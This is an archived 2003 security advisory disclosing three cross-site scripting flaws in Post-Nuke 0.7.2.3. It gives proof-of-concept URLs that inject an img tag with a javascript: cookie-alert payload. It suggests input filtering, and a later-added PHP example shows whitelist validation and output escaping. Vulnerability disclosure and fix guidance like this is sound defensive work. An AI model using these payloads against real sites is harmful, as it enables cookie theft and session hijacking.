Cross site scripting in Post-Nuke

From: David F. Madrid (idoruat_private)
Date: Fri Jun 13 2003 - 03:28:09 PDT


    Issue :
    
    Cross site scripting in Post-Nuke
    
    Version affected :
    
    Post Nuke 0.7.2.3-Phoenix
    
    Description :
    
    Post-Nuke is a content management system that allows
    you to deploy a website easily. Its developers claim
    that their product is more secure than its competitors'.
    
    I found three places where a script can be injected to
    be executed in the context of the webpage, making it possible
    to steal user cookies and hijack their sessions.
    
    http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@pelucas.com
    
    http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
    
    http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
    
    
    Solution :
    
    Although I am not a PHP developer, I think filtering of all
    non-alphanumeric characters is needed, not just filtering script
    tags passed to vars in the URL.
    
    // Drop every character that is not a letter or digit; the original regex had an unbalanced ")" and eregi_replace() no longer exists in PHP 7+
    $good_var = preg_replace('/[^a-z0-9]+/i', '', $var);
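
The fix in a fuller form, as an added example that is neither PostNuke's code nor the author's. It puts a stand-in for how the affected pages echo a URL parameter (render_unsafe, an assumption, since the advisory does not show PostNuke source) next to the script-tag blacklist the author says is insufficient, a per-field whitelist for the parameters named in the URLs above (letter, id_cat/parent_id, uname, email), and HTML escaping at output time. Every function name here is invented for the example. One caveat the page does not spell out: an email address needs "@" and ".", so the alphanumeric-only filter cannot be applied to that field unchanged, and the example validates its shape instead.

```php
<?php
// Added example (not PostNuke code): whitelist filtering of the advisory's
// URL parameters, plus HTML escaping when the value is written back into the page.

// Assumed shape of the vulnerable code: the parameter is echoed straight into HTML.
function render_unsafe(string $letter): string {
    return "<h2>Members starting with " . $letter . "</h2>";
}

// Blacklisting "<script>" tags alone does not catch the advisory's payload,
// which uses an <img> tag with a javascript: URL and never contains "script>".
function strip_script_tags(string $s): string {
    return preg_replace('#</?script[^>]*>#i', '', $s);
}

// The author's suggestion: keep letters and digits only (fits uname, categories).
function clean_alnum(string $s): string {
    return preg_replace('/[^a-z0-9]/i', '', $s);
}

// Members_List's "letter" parameter is a single letter; anything else is rejected.
function clean_letter(string $s): ?string {
    return preg_match('/^[A-Za-z]$/', $s) ? strtoupper($s) : null;
}

// id_cat and parent_id are numeric ids; reject anything that is not all digits.
function clean_int(string $s): ?int {
    return ctype_digit($s) ? (int) $s : null;
}

// The email field legitimately contains "@" and ".", so validate its shape
// rather than stripping non-alphanumerics.
function clean_email(string $s): ?string {
    $v = filter_var($s, FILTER_VALIDATE_EMAIL);
    return $v === false ? null : $v;
}

// Defence in depth: even a value that passed validation is escaped on output,
// so quotes and angle brackets can never close the surrounding attribute or tag.
function render_safe(string $letter): string {
    return "<h2>Members starting with "
        . htmlspecialchars($letter, ENT_QUOTES, 'UTF-8')
        . "</h2>";
}

// Constructed inputs: the payload shape from the advisory and a benign value.
$payload = '"><img src=javascript:alert(document.cookie)>';
$benign  = 'M';

echo "unsafe render:     ", render_unsafe($payload), "\n";
echo "script blacklist:  ", strip_script_tags($payload), "\n";
echo "alnum whitelist:   ", clean_alnum($payload), "\n";
echo "letter (payload):  "; var_dump(clean_letter($payload));
echo "letter (benign):   "; var_dump(clean_letter($benign));
echo "id_cat ('1'):      "; var_dump(clean_int('1'));
echo "id_cat ('1x'):     "; var_dump(clean_int('1x'));
echo "email:             "; var_dump(clean_email('user@example.com'));
echo "safe render:       ", render_safe($payload), "\n";
```

Run it with `php example.php`: the unsafe render and the script-tag blacklist both leave the `<img>` tag intact, the alphanumeric whitelist reduces the payload to a harmless word, the per-field validators return null for anything outside their expected shape so the request can be refused, and the escaped render shows the payload as literal text.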
    
    
    You can find a Spanish version of this advisory at
    
    http://nautopia.org/vulnerabilidades/postnuke_xss.htm
    
    
    Regards,
    
    David F. Madrid,
    Madrid, Spain
    



    This archive was generated by hypermail 2b30 : Fri Jun 13 2003 - 12:21:55 PDT